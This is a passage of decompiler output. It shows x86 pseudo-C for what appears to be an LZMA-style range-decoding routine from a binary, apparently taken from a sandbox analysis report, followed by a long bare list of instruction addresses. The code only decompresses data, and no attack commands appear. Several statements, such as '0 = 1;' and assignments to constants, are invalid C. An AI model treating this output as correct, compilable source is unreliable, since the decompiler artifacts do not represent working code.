							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                              0x00000000
                                                                                              0x004070ab
                                                                                              0x004070ab
                                                                                              0x004070af
                                                                                              0x00407166
                                                                                              0x00407169
                                                                                              0x00407175
                                                                                              0x00407056
                                                                                              0x00407056
                                                                                              0x00407059
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x004073ce
                                                                                              0x004073ce
                                                                                              0x004073d4
                                                                                              0x004073da
                                                                                              0x004073e0
                                                                                              0x004073fa
                                                                                              0x004073fd
                                                                                              0x00407403
                                                                                              0x0040740e
                                                                                              0x00407410
                                                                                              0x004073e2
                                                                                              0x004073e2
                                                                                              0x004073f1
                                                                                              0x004073f5
                                                                                              0x004073f5
                                                                                              0x0040741a
                                                                                              0x00407441
                                                                                              0x00407441
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00000000
                                                                                              0x0040741c
                                                                                              0x0040741c
                                                                                              0x00407420
                                                                                              0x004075cf
                                                                                              0x00000000
                                                                                              0x004075cf
                                                                                              0x0040742c
                                                                                              0x00407433
                                                                                              0x0040743b
                                                                                              0x0040743e
                                                                                              0x00000000
                                                                                              0x0040743e
                                                                                              0x004070b5
                                                                                              0x004070b9
                                                                                              0x004075fa
                                                                                              0x004075fa
                                                                                              0x004075fd
                                                                                              0x00407601
                                                                                              0x00407601
                                                                                              0x004070bf
                                                                                              0x004070c5
                                                                                              0x004070c8
                                                                                              0x004070cc
                                                                                              0x004070cf
                                                                                              0x004070d3
                                                                                              0x00407599
                                                                                              0x004075e5
                                                                                              0x004075ed
                                                                                              0x004075f4
                                                                                              0x004075f6
                                                                                              0x00000000
                                                                                              0x004075f6
                                                                                              0x004070d9
                                                                                              0x004070dc
                                                                                              0x004070e2
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e7
                                                                                              0x004070ea
                                                                                              0x004070ed
                                                                                              0x004070f0
                                                                                              0x004070f3
                                                                                              0x004070f6
                                                                                              0x004070f7
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070fc
                                                                                              0x004070ff
                                                                                              0x00407102
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407108
                                                                                              0x0040710a
                                                                                              0x0040710a
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x00406be3
                                                                                              0x00406be3
                                                                                              0x00406bec
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x00000000
                                                                                              0x00406bfd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c06
                                                                                              0x00406c09
                                                                                              0x00406c0c
                                                                                              0x00406c10
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c16
                                                                                              0x00406c19
                                                                                              0x00406c1b
                                                                                              0x00406c1c
                                                                                              0x00406c1f
                                                                                              0x00406c21
                                                                                              0x00406c22
                                                                                              0x00406c24
                                                                                              0x00406c27
                                                                                              0x00406c2c
                                                                                              0x00406c31
                                                                                              0x00406c3a
                                                                                              0x00406c4d
                                                                                              0x00406c50
                                                                                              0x00406c5c
                                                                                              0x00406c84
                                                                                              0x00406c86
                                                                                              0x00406c94
                                                                                              0x00406c94
                                                                                              0x00406c98
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c88
                                                                                              0x00406c8b
                                                                                              0x00406c8c
                                                                                              0x00406c8c
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c62
                                                                                              0x00406c67
                                                                                              0x00406c67
                                                                                              0x00406c70
                                                                                              0x00406c78
                                                                                              0x00406c7b
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c9e
                                                                                              0x00406c9e
                                                                                              0x00406ca2
                                                                                              0x0040754e
                                                                                              0x00000000
                                                                                              0x0040754e
                                                                                              0x00406cab
                                                                                              0x00406cbb
                                                                                              0x00406cbe
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc4
                                                                                              0x00406cc8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406cca
                                                                                              0x00406cd0
                                                                                              0x00406cfa
                                                                                              0x00406d00
                                                                                              0x00406d07
                                                                                              0x00000000
                                                                                              0x00406d07
                                                                                              0x00406cd6
                                                                                              0x00406cd9
                                                                                              0x00406cde
                                                                                              0x00406cde
                                                                                              0x00406ce9
                                                                                              0x00406cf1
                                                                                              0x00406cf4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d39
                                                                                              0x00406d3f
                                                                                              0x00406d42
                                                                                              0x00406d4f
                                                                                              0x00406d57
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d0e
                                                                                              0x00406d0e
                                                                                              0x00406d12
                                                                                              0x0040755d
                                                                                              0x00000000
                                                                                              0x0040755d
                                                                                              0x00406d1e
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d2c
                                                                                              0x00406d2f
                                                                                              0x00406d32
                                                                                              0x00406d37
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d5f
                                                                                              0x00406d61
                                                                                              0x00406d64
                                                                                              0x00406dd5
                                                                                              0x00406dd8
                                                                                              0x00406ddb
                                                                                              0x00406de2
                                                                                              0x00406dec
                                                                                              0x00000000
                                                                                              0x00406dec
                                                                                              0x00406d66
                                                                                              0x00406d6a
                                                                                              0x00406d6d
                                                                                              0x00406d6f
                                                                                              0x00406d72
                                                                                              0x00406d75
                                                                                              0x00406d77
                                                                                              0x00406d7a
                                                                                              0x00406d7c
                                                                                              0x00406d81
                                                                                              0x00406d84
                                                                                              0x00406d87
                                                                                              0x00406d8b
                                                                                              0x00406d92
                                                                                              0x00406d95
                                                                                              0x00406d9c
                                                                                              0x00406da0
                                                                                              0x00406da8
                                                                                              0x00406da8
                                                                                              0x00406da8
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406dac
                                                                                              0x00406daf
                                                                                              0x00406dcd
                                                                                              0x00406dcf
                                                                                              0x00000000
                                                                                              0x00406db1
                                                                                              0x00406db1
                                                                                              0x00406db4
                                                                                              0x00406db7
                                                                                              0x00406dba
                                                                                              0x00406dbc
                                                                                              0x00406dbc
                                                                                              0x00406dbc
                                                                                              0x00406dbf
                                                                                              0x00406dc2
                                                                                              0x00406dc4
                                                                                              0x00406dc5
                                                                                              0x00406dc8
                                                                                              0x00000000
                                                                                              0x00406dc8
                                                                                              0x00000000
                                                                                              0x00406ffe
                                                                                              0x00407002
                                                                                              0x00407020
                                                                                              0x00407023
                                                                                              0x0040702a
                                                                                              0x0040702d
                                                                                              0x00407030
                                                                                              0x00407033
                                                                                              0x00407036
                                                                                              0x00407039
                                                                                              0x0040703b
                                                                                              0x00407042
                                                                                              0x00407043
                                                                                              0x00407045
                                                                                              0x00407048
                                                                                              0x0040704b
                                                                                              0x0040704e
                                                                                              0x0040704e
                                                                                              0x00407053
                                                                                              0x00000000
                                                                                              0x00407053
                                                                                              0x00407004
                                                                                              0x00407007
                                                                                              0x0040700a
                                                                                              0x00407014
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407068
                                                                                              0x0040706c
                                                                                              0x0040708f
                                                                                              0x00407092
                                                                                              0x00407095
                                                                                              0x0040709f
                                                                                              0x0040706e
                                                                                              0x0040706e
                                                                                              0x00407071
                                                                                              0x00407074
                                                                                              0x00407077
                                                                                              0x00407084
                                                                                              0x00407087
                                                                                              0x00407087
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040711c
                                                                                              0x00407120
                                                                                              0x00407127
                                                                                              0x0040712a
                                                                                              0x0040712d
                                                                                              0x00407137
                                                                                              0x00000000
                                                                                              0x00407137
                                                                                              0x00407122
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407143
                                                                                              0x00407147
                                                                                              0x0040714e
                                                                                              0x00407151
                                                                                              0x00407154
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407157
                                                                                              0x0040715a
                                                                                              0x0040715d
                                                                                              0x0040715d
                                                                                              0x00407160
                                                                                              0x00407163
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407203
                                                                                              0x00407203
                                                                                              0x00407207
                                                                                              0x004075a5
                                                                                              0x00000000
                                                                                              0x004075a5
                                                                                              0x0040720d
                                                                                              0x00407210
                                                                                              0x00407213
                                                                                              0x00407217
                                                                                              0x0040721a
                                                                                              0x00407220
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407225
                                                                                              0x00407228
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406df8
                                                                                              0x00406df8
                                                                                              0x00406dfc
                                                                                              0x00407569
                                                                                              0x00000000
                                                                                              0x00407569
                                                                                              0x00406e02
                                                                                              0x00406e05
                                                                                              0x00406e08
                                                                                              0x00406e0c
                                                                                              0x00406e0f
                                                                                              0x00406e15
                                                                                              0x00406e17
                                                                                              0x00406e17
                                                                                              0x00406e17
                                                                                              0x00406e1a
                                                                                              0x00406e1d
                                                                                              0x00406e1d
                                                                                              0x00406e20
                                                                                              0x00406e23
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406e29
                                                                                              0x00406e2f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406e35
                                                                                              0x00406e35
                                                                                              0x00406e39
                                                                                              0x00406e3c
                                                                                              0x00406e3f
                                                                                              0x00406e42
                                                                                              0x00406e45
                                                                                              0x00406e46
                                                                                              0x00406e49
                                                                                              0x00406e4b
                                                                                              0x00406e51
                                                                                              0x00406e54
                                                                                              0x00406e57
                                                                                              0x00406e5a
                                                                                              0x00406e5d
                                                                                              0x00406e60
                                                                                              0x00406e63
                                                                                              0x00406e7f
                                                                                              0x00406e82
                                                                                              0x00406e85
                                                                                              0x00406e88
                                                                                              0x00406e8f
                                                                                              0x00406e93
                                                                                              0x00406e95
                                                                                              0x00406e99
                                                                                              0x00406e65
                                                                                              0x00406e65
                                                                                              0x00406e69
                                                                                              0x00406e71
                                                                                              0x00406e76
                                                                                              0x00406e78
                                                                                              0x00406e7a
                                                                                              0x00406e7a
                                                                                              0x00406e9c
                                                                                              0x00406ea3
                                                                                              0x00406ea6
                                                                                              0x00000000
                                                                                              0x00406eac
                                                                                              0x00000000
                                                                                              0x00406eac
                                                                                              0x00000000
                                                                                              0x00406eb1
                                                                                              0x00406eb1
                                                                                              0x00406eb5
                                                                                              0x00407575
                                                                                              0x00000000
                                                                                              0x00407575
                                                                                              0x00406ebb
                                                                                              0x00406ebe
                                                                                              0x00406ec1
                                                                                              0x00406ec5
                                                                                              0x00406ec8
                                                                                              0x00406ece
                                                                                              0x00406ed0
                                                                                              0x00406ed0
                                                                                              0x00406ed0
                                                                                              0x00406ed3
                                                                                              0x00406ed6
                                                                                              0x00406ed6
                                                                                              0x00406ed6
                                                                                              0x00406edc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406ede
                                                                                              0x00406ee1
                                                                                              0x00406ee4
                                                                                              0x00406ee7
                                                                                              0x00406eea
                                                                                              0x00406eed
                                                                                              0x00406ef0
                                                                                              0x00406ef3
                                                                                              0x00406ef6
                                                                                              0x00406ef9
                                                                                              0x00406efc
                                                                                              0x00406f14
                                                                                              0x00406f17
                                                                                              0x00406f1a
                                                                                              0x00406f1d
                                                                                              0x00406f1d
                                                                                              0x00406f20
                                                                                              0x00406f24
                                                                                              0x00406f26
                                                                                              0x00406efe
                                                                                              0x00406efe
                                                                                              0x00406f06
                                                                                              0x00406f0b
                                                                                              0x00406f0d
                                                                                              0x00406f0f
                                                                                              0x00406f0f
                                                                                              0x00406f29
                                                                                              0x00406f30
                                                                                              0x00406f33
                                                                                              0x00000000
                                                                                              0x00406f35
                                                                                              0x00000000
                                                                                              0x00406f35
                                                                                              0x00406f33
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f75
                                                                                              0x00406f75
                                                                                              0x00406f79
                                                                                              0x00407581
                                                                                              0x00000000
                                                                                              0x00407581
                                                                                              0x00406f7f
                                                                                              0x00406f82
                                                                                              0x00406f85
                                                                                              0x00406f89
                                                                                              0x00406f8c
                                                                                              0x00406f92
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f97
                                                                                              0x00406f9a
                                                                                              0x00406f9a
                                                                                              0x00406fa0
                                                                                              0x00406f3e
                                                                                              0x00406f3e
                                                                                              0x00406f41
                                                                                              0x00000000
                                                                                              0x00406f41
                                                                                              0x00406fa2
                                                                                              0x00406fa2
                                                                                              0x00406fa5
                                                                                              0x00406fa8
                                                                                              0x00406fab
